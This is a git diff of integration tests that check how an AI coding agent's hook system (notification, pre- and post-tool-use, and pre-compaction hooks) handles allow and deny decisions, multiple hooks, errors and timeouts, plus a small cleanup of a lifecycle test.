'notification-elication-dialog-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Error should be handled gracefully and not block execution + const result = await rig.run('Say elication dialog error test'); + + expect(result).toBeDefined(); + }); + }); + + describe('Multiple Notification Hooks', () => { + it('should handle multiple different notification types correctly', async () => { + const notificationScript1 = + 'echo \'{"additionalContext": "Generic notification 1"}\''; + const notificationScript2 = + 'echo \'{"additionalContext": "Generic notification 2"}\''; + + await rig.setup('notification-multiple-different', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: notificationScript1, + name: 'notification-multiple-hook-1', + timeout: 5000, + }, + { + type: 'command', + command: notificationScript2, + name: 'notification-multiple-hook-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Say multiple different notification test', + ); + + expect(result).toBeDefined(); + }); + }); + + describe('Notification Hook Error Handling', () => { + it('should handle missing command gracefully', async () => { + await rig.setup('notification-missing-command', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: '', // Empty command + name: 'notification-empty-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Empty command should be skipped gracefully + const result = await rig.run('Say missing command test'); + + expect(result).toBeDefined(); + }); + + it('should handle non-executable command gracefully', async () => { + await rig.setup('notification-non-executable', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/path/to/command', + name: 
'notification-non-exec-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Non-existent command should be handled gracefully + const result = await rig.run('Say non-executable command test'); + + expect(result).toBeDefined(); + }); + + it('should handle command with non-zero exit code gracefully', async () => { + await rig.setup('notification-nonzero-exit', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: 'echo "warning" >&2 && exit 1', + name: 'notification-nonzero-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Non-zero exit should be handled gracefully for notification hooks + const result = await rig.run('Say nonzero exit code test'); + + expect(result).toBeDefined(); + }); + + it('should handle command timeout gracefully', async () => { + await rig.setup('notification-timeout', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 10', + name: 'notification-timeout-hook', + timeout: 1000, // Very short timeout to trigger timeout condition + }, + ], + }, + ], + }, + }, + }); + + // Timeout should be handled gracefully + const result = await rig.run('Say timeout test'); + + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // PreToolUse Hooks + // Triggered before a tool is executed + // ========================================================================== + describe('PreToolUse Hooks', () => { + describe('Allow Decision', () => { + it('should allow tool execution when hook returns allow decision', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Tool execution approved by pretooluse hook"}}\''; + + await rig.setup('pretooluse-allow-decision', { + settings: { + hooksConfig: { 
enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'pretooluse-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello world'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should allow tool execution with additional context from hook', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Security check passed by pretooluse hook", "additionalContext": "Security check passed by pretooluse hook"}}\''; + + await rig.setup('pretooluse-allow-with-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'pretooluse-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say context test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Block Decision', () => { + it('should block tool execution when hook returns block decision', async () => { + const blockScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "deny", "permissionDecisionReason": "Tool execution blocked by security policy in pretooluse"}}\''; + + await rig.setup('pretooluse-block-decision', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: blockScript, + name: 'pretooluse-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When PreToolUse hook blocks, the interaction should still return a response + const result = await rig.run('Say should be 
blocked'); + + // Verify that a response was received despite the block + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block specific tools based on tool name matching', async () => { + const blockSpecificToolScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + + if [ "$TOOL_NAME" = "write_file" ]; then + echo '{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "deny", "permissionDecisionReason": "File writing blocked by pretooluse hook"}}' + else + echo '{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Tool allowed by pretooluse hook"}}' + fi + `; + + await rig.setup('pretooluse-block-specific-tool', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: blockSpecificToolScript, + name: 'pretooluse-block-specific-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Attempt to say something - should be blocked by the hook for write_file operations + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + + // But other prompts should still work + const readResult = await rig.run('Say hello from other tools'); + expect(readResult).toBeDefined(); + expect(readResult.length).toBeGreaterThan(0); + }); + }); + + describe('Matcher Scenarios', () => { + it('should match specific tools with regex matcher', async () => { + const specificToolScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Specific tool matched and allowed by pretooluse", "additionalContext": "Specific tool matched and allowed by pretooluse"}}\''; + + await rig.setup('pretooluse-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + 
PreToolUse: [ + { + matcher: 'write_file|read_file', + hooks: [ + { + type: 'command', + command: specificToolScript, + name: 'pretooluse-specific-tool-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say matcher test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should match all tools with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Wildcard matcher allowed all tools in pretooluse", "additionalContext": "Wildcard matcher allowed all tools in pretooluse"}}\''; + + await rig.setup('pretooluse-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'pretooluse-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Should not execute in pretooluse", "additionalContext": "Should not execute in pretooluse"}}\''; + + await rig.setup('pretooluse-matcher-no-match', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + matcher: 'nonexistent_tool', // This won't match any real tool + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'pretooluse-no-match-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await 
rig.run('Say no match test'); + + // Verify that the interaction completed successfully (the hook's matcher should not match any tool, so the hook is not expected to run) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Error Handling', () => { + it('should continue execution when hook exits with non-blocking error', async () => { + await rig.setup('pretooluse-nonblocking-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'pretooluse-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say error test'); + + // Verify that the interaction completed successfully despite the hook error + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should continue execution when hook command does not exist', async () => { + await rig.setup('pretooluse-missing-command', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/pretooluse/command', + name: 'pretooluse-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say missing test'); + + // Verify that the interaction completed successfully despite the missing hook command + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Multiple PreToolUse Hooks', () => { + it('should execute multiple parallel PreToolUse hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel pretooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel pretooluse hook 2"}}\''; + + await rig.setup('pretooluse-multi-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', +
command: script1, + name: 'pretooluse-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'pretooluse-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say parallel test'); + + // Verify that the interaction completed successfully with multiple parallel hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should execute sequential PreToolUse hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential pretooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential pretooluse hook 2"}}\''; + + await rig.setup('pretooluse-multi-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'pretooluse-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'pretooluse-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential test'); + + // Verify that the interaction completed successfully with multiple sequential hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block when one of multiple parallel hooks returns block', async () => { + const allowScript = 'echo \'{"decision": "allow"}\''; + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked by security policy in parallel pretooluse"}\''; + + await rig.setup('pretooluse-multi-one-blocks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'pretooluse-allow-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'pretooluse-block-hook', + timeout: 5000, + }, + ], + }, + ], + 
}, + }, + }); + + // When one hook blocks, the tool should not execute + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received despite the block + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block when first sequential hook returns block', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "First hook blocks in sequential pretooluse"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('pretooluse-seq-first-blocks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: blockScript, + name: 'pretooluse-seq-block-hook', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'pretooluse-seq-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When the first hook blocks, the tool should not execute + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received despite the block + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from pretooluse hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from pretooluse hook 2"}}\''; + + await rig.setup('pretooluse-multi-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'pretooluse-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'pretooluse-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi context test'); + + // Verify that the interaction 
completed successfully with multiple context hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + }); + + // ========================================================================== + // PostToolUse Hooks + // Triggered after a tool executes successfully + // ========================================================================== + describe('PostToolUse Hooks', () => { + describe('Basic Functionality', () => { + it('should execute PostToolUse hook after successful tool execution', async () => { + const hookScript = + 'echo \'{"decision": "allow", "reason": "Tool execution logged by posttooluse hook", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Tool execution logged by posttooluse hook"}}\''; + + await rig.setup('posttooluse-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'posttooluse-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say posttooluse test'); + + // Verify that the interaction completed successfully with the posttooluse hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Matcher Scenarios', () => { + it('should match specific tools with regex matcher', async () => { + const specificToolScript = + 'echo \'{"decision": "allow", "reason": "Specific tool matched by posttooluse", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Specific tool matched by posttooluse"}}\''; + + await rig.setup('posttooluse-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + matcher: 'write_file|read_file', + hooks: [ + { + type: 'command', + command: specificToolScript, + name: 'posttooluse-specific-tool-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say matcher 
test'); + + // Verify that the interaction completed successfully with the posttooluse hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should match all tools with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "reason": "Wildcard matcher processed all tools in posttooluse", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Wildcard matcher processed all tools in posttooluse"}}\''; + + await rig.setup('posttooluse-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'posttooluse-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + + // Verify that the interaction completed successfully with the posttooluse hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"decision": "allow", "reason": "Should not execute in posttooluse", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Should not execute in posttooluse"}}\''; + + await rig.setup('posttooluse-matcher-no-match', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + matcher: 'nonexistent_tool', // This won't match any real tool + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'posttooluse-no-match-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say no match test'); + + // Verify that the interaction completed successfully (the hook didn't block execution since it didn't match) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Multiple PostToolUse Hooks', () => { + it('should execute 
multiple parallel PostToolUse hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "reason": "Parallel posttooluse hook 1", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Parallel posttooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "reason": "Parallel posttooluse hook 2", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Parallel posttooluse hook 2"}}\''; + + await rig.setup('posttooluse-multi-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'posttooluse-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'posttooluse-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say parallel test'); + + // Verify that the interaction completed successfully with multiple posttooluse hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should execute sequential PostToolUse hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "reason": "Sequential posttooluse hook 1", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Sequential posttooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "reason": "Sequential posttooluse hook 2", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Sequential posttooluse hook 2"}}\''; + + await rig.setup('posttooluse-multi-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'posttooluse-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'posttooluse-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential test'); + + // 
Verify that the interaction completed successfully with multiple sequential posttooluse hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "reason": "Context from posttooluse hook 1", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Context from posttooluse hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "reason": "Context from posttooluse hook 2", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Context from posttooluse hook 2"}}\''; + + await rig.setup('posttooluse-multi-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'posttooluse-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'posttooluse-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi context test'); + + // Verify that the interaction completed successfully with multiple context posttooluse hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + }); + + // ========================================================================== + // PostToolUseFailure Hooks + // Triggered after a tool fails to execute + // ========================================================================== + describe('PostToolUseFailure Hooks', () => { + describe('Basic Functionality', () => { + it('should execute PostToolUseFailure hook after failed tool execution', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Tool failure logged by posttoolusefailure hook"}}\''; + + await rig.setup('posttoolusefailure-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUseFailure: [ + { + hooks: [ + { + 
type: 'command', + command: hookScript, + name: 'posttoolusefailure-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Attempt to read a non-existent file to trigger a tool failure + const result = await rig.run('Read the nonexistent-file.txt file'); + + // The tool should fail, but the hook should still execute + expect(result).toBeDefined(); + }); + + it('should receive tool failure details in hook input', async () => { + const hookScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + ERROR_MESSAGE=$(echo "$INPUT" | jq -r '.error_message // empty') + + echo '{"hookSpecificOutput": {"additionalContext": "Failed ' + '$TOOL_NAME' + ' with error: ' + '$ERROR_MESSAGE' + '"}}' + `; + + await rig.setup('posttoolusefailure-with-details', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUseFailure: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'posttoolusefailure-details-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Attempt to read a non-existent file to trigger a tool failure + const result = await rig.run('Read the nonexistent-details.txt file'); + + // The tool should fail, but the hook should still execute and process the error details + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // PreCompact Hooks + // Triggered before conversation compaction + // ========================================================================== + describe('PreCompact Hooks', () => { + describe('Basic Functionality', () => { + it('should execute PreCompact hook before conversation compaction', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Compaction approved by precompact hook"}}\''; + + await rig.setup('precompact-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { 
+ type: 'command', + command: hookScript, + name: 'precompact-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact test'); + + // Verify that the interaction completed successfully with the precompact hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should receive compaction details in hook input', async () => { + const hookScript = ` + INPUT=$(cat) + TRIGGER=$(echo "$INPUT" | jq -r '.trigger') + CUSTOM_INSTRUCTIONS=$(echo "$INPUT" | jq -r '.custom_instructions // empty') + + echo '{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Compaction triggered by: ' + '$TRIGGER' + ', Instructions length: $(echo "$CUSTOM_INSTRUCTIONS" | wc -c)"}}' + `; + + await rig.setup('precompact-with-details', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'precompact-details-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact details test'); + + // Verify that the interaction completed successfully with the precompact hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Context Scenarios', () => { + it('should provide additional context when hook returns context', async () => { + const contextScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Compaction context provided by precompact hook"}}\''; + + await rig.setup('precompact-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'precompact-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact context test'); + + // Verify that the interaction completed successfully with context + 
expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Matcher Scenarios', () => { + it('should match all compaction triggers with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Wildcard matcher allowed compaction in precompact"}}\''; + + await rig.setup('precompact-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'precompact-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact wildcard test'); + + // Verify that the interaction completed successfully with the wildcard matcher + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Should not execute in precompact"}}\''; + + await rig.setup('precompact-matcher-no-match', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + matcher: 'nonexistent_trigger', // This won't match any real trigger + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'precompact-no-match-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact no match test'); + + // Verify that the interaction completed successfully (the hook didn't block execution since it didn't match) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Multiple PreCompact Hooks', () => { + it('should execute multiple parallel PreCompact hooks', async () => { + const script1 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Parallel precompact 
hook 1"}}\''; + const script2 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Parallel precompact hook 2"}}\''; + + await rig.setup('precompact-multi-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'precompact-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'precompact-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact parallel test'); + + // Verify that the interaction completed successfully with multiple parallel hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should execute sequential PreCompact hooks in order', async () => { + const script1 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Sequential precompact hook 1"}}\''; + const script2 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Sequential precompact hook 2"}}\''; + + await rig.setup('precompact-multi-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'precompact-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'precompact-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact sequential test'); + + // Verify that the interaction completed successfully with multiple sequential hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Context from precompact hook 1"}}\''; + const context2 = + 'echo 
\'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Context from precompact hook 2"}}\''; + + await rig.setup('precompact-multi-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'precompact-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'precompact-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact multi context test'); + + // Verify that the interaction completed successfully with multiple context hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Error Handling', () => { + it('should continue execution when hook exits with error', async () => { + await rig.setup('precompact-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'precompact-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact error test'); + + // Verify that the interaction completed successfully despite the hook error + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should continue execution when hook command does not exist', async () => { + await rig.setup('precompact-missing-command', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/precompact/command', + name: 'precompact-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact missing test'); + + // Verify that the interaction completed successfully despite the missing hook command + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should handle hook timeout 
gracefully', async () => { + await rig.setup('precompact-timeout', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 60', + name: 'precompact-timeout-hook', + timeout: 1000, // 1 second timeout + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact timeout test'); + + // Verify that the interaction completed successfully despite the hook timeout + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + }); }); diff --git a/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts b/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts index d4566fcf3..f9bd77963 100644 --- a/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts +++ b/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts @@ -13,7 +13,6 @@ import { isSDKAssistantMessage, isSDKResultMessage, type TextBlock, - type ContentBlock, type SDKUserMessage, } from '@qwen-code/sdk'; import { @@ -149,7 +148,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { describe('Process Lifecycle Monitoring', () => { it('should handle normal process completion', async () => { const q = query({ - prompt: 'Why do we choose to go to the moon?', + prompt: 'Say hello', options: { ...SHARED_TEST_OPTIONS, cwd: testDir, @@ -158,18 +157,12 @@ describe('AbortController and Process Lifecycle (E2E)', () => { }); let completedSuccessfully = false; + let receivedAssistantMessage = false; try { for await (const message of q) { if (isSDKAssistantMessage(message)) { - const textBlocks = message.message.content.filter( - (block): block is TextBlock => block.type === 'text', - ); - const text = textBlocks - .map((b) => b.text) - .join('') - .slice(0, 100); - expect(text.length).toBeGreaterThan(0); + receivedAssistantMessage = true; } } @@ -180,6 +173,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { } finally { await q.close(); 
